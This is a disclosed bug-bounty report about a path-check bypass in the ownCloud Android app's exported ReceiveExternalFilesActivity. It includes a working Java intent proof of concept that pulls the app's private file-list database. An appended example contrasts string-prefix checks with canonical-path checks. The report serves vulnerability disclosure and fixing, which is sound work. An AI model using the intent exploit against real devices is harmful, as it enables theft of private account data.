URL: https://hackerone.com/reports/377107
#377107
Possible to steal any protected files on Android
Timeline
shell_c0de submitted a report to ownCloud. Jul 4th (5 years ago)

Hi. I have found an issue which allows retrieving any files from the
/data/data/com.owncloud.android/* directory. The problem is in the exported
activity com.owncloud.android.ui.activity.ReceiveExternalFilesActivity, which
accepts a URI to download files. I see that you've added verification of the
path /data/data/. You can bypass the verification by specifying an alternative
path: /data/user/0/com.owncloud.android/

Malicious code:

    StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
    StrictMode.setVmPolicy(builder.build());
    Intent intent = new Intent("android.intent.action.SEND");
    intent.setClassName("com.owncloud.android",
            "com.owncloud.android.ui.activity.ReceiveExternalFilesActivity");
    intent.setType("*/*");
    intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
    intent.putExtra("android.intent.extra.STREAM",
            Uri.parse("file:///data/user/0/com.owncloud.android/databases/filelist"));
    startActivity(intent);


HOW TO FIX

Add an alternative path to the folder check


IMPACT

This vulnerability can get a complete account; malware can access everything,
including the file database and history.
 * 3 attachments:
 * F315553: owncloud_PoC.apk
 * F315557: 2VkPnMdf2YY.jpg
 * F315558: td0jJcli45Y.jpg
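
The report's fix direction (the folder check must also cover the alternative path) generalizes to comparing resolved paths instead of path strings, so that every alias of the private directory is caught at once. The following is an added example, not ownCloud's code and not part of the report: it runs on a desktop JVM on a POSIX system, the temp-directory layout and symlink are constructed to mimic two prefixes naming the same directory, and the names PrivateDirCheck, naiveIsPrivate and isInsidePrivateDir are hypothetical.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class PrivateDirCheck {
    // String-prefix check of the kind the report describes as bypassed:
    // it only recognises one spelling of the private directory.
    static boolean naiveIsPrivate(String path, String blockedPrefix) {
        return path.startsWith(blockedPrefix);
    }

    // Resolve symlinks and relative segments on BOTH sides, then compare
    // whole path components (so ".../pkg" does not match ".../pkg-other").
    static boolean isInsidePrivateDir(File candidate, File privateDir) throws IOException {
        Path resolved = candidate.getCanonicalFile().toPath();
        Path root = privateDir.getCanonicalFile().toPath();
        return resolved.startsWith(root);
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout: <tmp>/data/data/pkg is the real directory and
        // <tmp>/data/user/0 is a symlink to <tmp>/data/data.
        Path tmp = Files.createTempDirectory("alias-demo");
        Path db = Files.createDirectories(tmp.resolve("data/data/pkg/databases"));
        Files.createFile(db.resolve("filelist"));
        Files.createDirectories(tmp.resolve("data/user"));
        Files.createSymbolicLink(tmp.resolve("data/user/0"), tmp.resolve("data/data"));
        Files.createFile(tmp.resolve("public.txt"));

        File privateDir = tmp.resolve("data/data/pkg").toFile();
        String blocked = privateDir.getPath() + File.separator;
        File[] inputs = {
            tmp.resolve("data/data/pkg/databases/filelist").toFile(), // direct path
            tmp.resolve("data/user/0/pkg/databases/filelist").toFile(), // alias path
            tmp.resolve("public.txt").toFile(), // file outside the private dir
        };
        System.out.println("naive canon path");
        for (File f : inputs) {
            System.out.printf("%-5b %-5b %s%n",
                naiveIsPrivate(f.getPath(), blocked),
                isInsidePrivateDir(f, privateDir),
                f.getPath().substring(tmp.toString().length()));
        }
    }
}
```

The two checks disagree only on the alias row, where the string comparison misses the private file and the canonical comparison flags it. In an Android app the private root would come from the platform (for example Context.getDataDir() on API 24+) rather than a hard-coded string.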





 * Reported: July 4, 2018 1:55pm +0000, by shell_c0de
 * State: Resolved
 * Reported to: ownCloud
 * Disclosed: November 15, 2021 8:40am +0000
 * Severity: Medium (4 ~ 6.9)
 * Weakness: Information Disclosure
 * Bounty: $750
 * Time spent: None
 * CVE ID: None
 * Account de...: None
